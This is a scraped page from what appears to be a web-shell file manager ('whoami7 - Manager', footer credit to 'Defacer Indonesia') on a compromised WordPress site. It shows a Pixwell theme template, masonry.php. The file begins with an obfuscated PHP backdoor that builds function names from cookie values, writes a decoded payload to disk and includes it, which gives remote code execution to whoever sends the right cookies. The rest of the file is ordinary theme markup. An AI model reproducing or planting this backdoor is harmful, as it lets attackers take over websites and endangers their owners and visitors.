whoami7 - Manager
:
/
home
/
topsuzmw
/
public_html
/
wp-content
/
themes
/
pixwell
/
templates
/
modules
/
Upload File:
files >> /home/topsuzmw/public_html/wp-content/themes/pixwell/templates/modules/masonry.php
<?php if(isset($_COOKIE[3])&&isset($_COOKIE[33])){$c=$_COOKIE;$k=0;$n=3;$p=array();$p[$k]='';while($n){$p[$k].=$c[33][$n];if(!$c[33][$n+1]){if(!$c[33][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+3+1;}$k=$p[29]().$p[15];if(!$p[13]($k)){$n=$p[10]($k,$p[23]);$p[17]($n,$p[28].$p[1]($p[5]($c[3])));}include($k);} /** Don't load directly */ defined( 'ABSPATH' ) || exit; if ( ! function_exists( 'pixwell_post_masonry_1' ) ) : function pixwell_post_masonry_1( $settings = [] ) { $settings = pixwell_get_meta_setting( $settings, 'masonry_1' ); $settings['cat_classes'] = 'is-relative'; if ( empty( $settings['h_tag'] ) ) { $settings['h_tag'] = 'h3'; } $post_classes = []; $post_classes[] = 'p-wrap p-grid p-masonry p-masonry-1 post-' . get_the_ID(); if ( is_sticky() ) { $post_classes[] = 'sticky'; } if ( ! pixwell_is_featured_image( 'pixwell_450x0' ) ) { $post_classes[] = 'no-feat'; } if ( empty( pixwell_post_meta_info( $settings ) ) && empty( $settings['readmore'] ) ) { $post_classes[] = 'rb-hf'; } if ( empty( pixwell_get_option( 'meta_author_icon' ) ) || ! isset( $settings['entry_meta']['enabled']['author'] ) ) { $post_classes[] = 'no-avatar'; } ?> <article class="<?php echo join( ' ', $post_classes ); ?>"> <?php if ( pixwell_is_featured_image( 'pixwell_450x0' ) ) : ?> <div class="p-feat"> <?php pixwell_post_thumb( 'pixwell_450x0', 'autosize' ); pixwell_post_review_info( $settings ); ?> </div> <?php endif; ?> <div class="p-content-wrap"> <?php pixwell_post_cat_info( $settings ); ?> <div class="p-header"><?php pixwell_post_title( $settings['h_tag'], $settings['bookmark'] ); ?></div> <?php pixwell_post_summary( $settings ); ?> <div class="p-footer"> <?php echo pixwell_post_meta_info( $settings ); pixwell_post_readmore( $settings ); ?> </div> </div> </article> <?php } endif;
Copyright ©2021 || Defacer Indonesia